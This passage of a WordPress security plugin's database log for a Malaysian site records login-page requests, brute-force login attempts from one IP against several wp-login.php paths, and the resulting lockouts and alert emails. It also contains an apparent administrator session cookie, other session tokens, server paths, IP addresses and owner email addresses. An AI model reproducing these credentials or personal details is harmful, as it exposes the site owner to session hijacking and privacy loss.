\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZJLUnlR@6WyRVzpiD0lgAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"60.53.43.49\";s:11:\"REMOTE_PORT\";s:5:\"51136\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZJLUnlR@6WyRVzpiD0lgAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081645.3681\";s:12:\"REQUEST_TIME\";s:10:\"1569081645\";}}','notice','2019-09-21 16:00:47','2019-09-21 16:00:46',30730104,32538368,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/network/admin.php?page=itsec&module_type=recommended&reauth=1',1,0,'60.53.43.49'),(26751,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:67:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:133:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/network/admin.php?page=itsec&module=global&module_type=recommended&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:3:\"4-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"en-GB,en-US;q=0.9,en;q=0.8,ms;q=0.7\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C5a7eb2dbbd5135c4abaf789cb6fe892ffcb7da479e43228c16fe327acfb46940; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569072852; icwp-wpsf=198b1f53e9059ccdc4c959fb4526ed72\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:14:\"HTTP_SAVE_DATA\";s:2:\"on\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"4-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYZJS0nlR@6WyRVzpiD0swAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZJS0nlR@6WyRVzpiD0swAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"60.53.43.49\";s:11:\"REMOTE_PORT\";s:5:\"51194\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZJS0nlR@6WyRVzpiD0swAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081675.8926\";s:12:\"REQUEST_TIME\";s:10:\"1569081675\";}}','notice','2019-09-21 16:01:17','2019-09-21 16:01:16',30733928,32547112,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/network/admin.php?page=itsec&module=global&module_type=recommended&reauth=1',1,0,'60.53.43.49'),(26752,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"7\";s:13:\"H2_STREAM_TAG\";s:4:\"20-7\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"en-GB,en-US;q=0.9,en;q=0.8,ms;q=0.7\";s:11:\"HTTP_COOKIE\";s:367:\"wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C5a7eb2dbbd5135c4abaf789cb6fe892ffcb7da479e43228c16fe327acfb46940; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1; wp-settings-time-1=1569072852; icwp-wpsf=198b1f53e9059ccdc4c959fb4526ed72\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:99:\"https://bintara.com.my/wp-admin/admin.php?page=aiowpsec_filescan&ip-geo-block-auth-nonce=895ddd2db6\";s:14:\"HTTP_SAVE_DATA\";s:2:\"on\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Linux; Android 9; EML-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"20-7\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYZJgEnlR@6WyRVzpiD1BQAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZJgEnlR@6WyRVzpiD1BQAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"60.53.43.49\";s:11:\"REMOTE_PORT\";s:5:\"51198\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZJgEnlR@6WyRVzpiD1BQAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081728.6371\";s:12:\"REQUEST_TIME\";s:10:\"1569081728\";}}','notice','2019-09-21 16:02:10','2019-09-21 16:02:09',30730712,32538760,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'60.53.43.49'),(26753,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=9af1f8b2247c0a1f3354dfafb654cc71\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZJ4nkXpgmG5P@iB8lKGAAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.239.43.161\";s:11:\"REMOTE_PORT\";s:5:\"33160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZJ4nkXpgmG5P@iB8lKGAAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569081827.0396\";s:12:\"REQUEST_TIME\";s:10:\"1569081827\";}}','notice','2019-09-21 16:03:48','2019-09-21 16:03:47',31158552,32691176,'https://bintara.com.my/blog/wp-login.php',1,0,'182.239.43.161'),(26754,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 00:03:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 16:03:47\";s:14:\"lockout_expire\";s:19:\"2019-09-26 04:03:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 20:03:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 16:03:48','2019-09-21 16:03:47',31239960,32691176,'https://bintara.com.my/blog/wp-login.php',1,0,'182.239.43.161'),(26755,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 16:03:48','2019-09-21 16:03:47',31863184,32691176,'https://bintara.com.my/blog/wp-login.php',1,0,'182.239.43.161'),(26756,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=01501e7e673b1b6af93b9200c7adc343\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZRDknlR@6WyRVzpiD6-QAAAAQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.239.43.161\";s:11:\"REMOTE_PORT\";s:5:\"54538\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZRDknlR@6WyRVzpiD6-QAAAAQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569083662.6846\";s:12:\"REQUEST_TIME\";s:10:\"1569083662\";}}','notice','2019-09-21 16:34:24','2019-09-21 16:34:23',31161248,32685640,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(26757,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 00:34:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 16:34:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 04:34:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 20:34:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 16:34:24','2019-09-21 16:34:23',31242656,32685640,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(26758,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 16:34:24','2019-09-21 16:34:23',31865952,32685640,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(26759,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=766d69458c867251a342715d06cf9d90\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZR6UnlR@6WyRVzpiD7VwAAAAI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.239.43.161\";s:11:\"REMOTE_PORT\";s:5:\"37298\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZR6UnlR@6WyRVzpiD7VwAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569083881.5447\";s:12:\"REQUEST_TIME\";s:10:\"1569083881\";}}','notice','2019-09-21 16:38:03','2019-09-21 16:38:02',31159920,32694432,'https://bintara.com.my/wordpress/wp-login.php',1,0,'182.239.43.161'),(26760,0,'lockout','host-lockout::182.239.43.161','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"182.239.43.161\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 00:38:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 16:38:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 04:38:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 20:38:02\";s:12:\"lockout_host\";s:14:\"182.239.43.161\";}','action','2019-09-21 16:38:03','2019-09-21 16:38:02',31242144,32694432,'https://bintara.com.my/wordpress/wp-login.php',1,0,'182.239.43.161'),(26761,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"182.239.43.161\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 00:38:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 16:38:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 04:38:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 20:38:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 16:38:03','2019-09-21 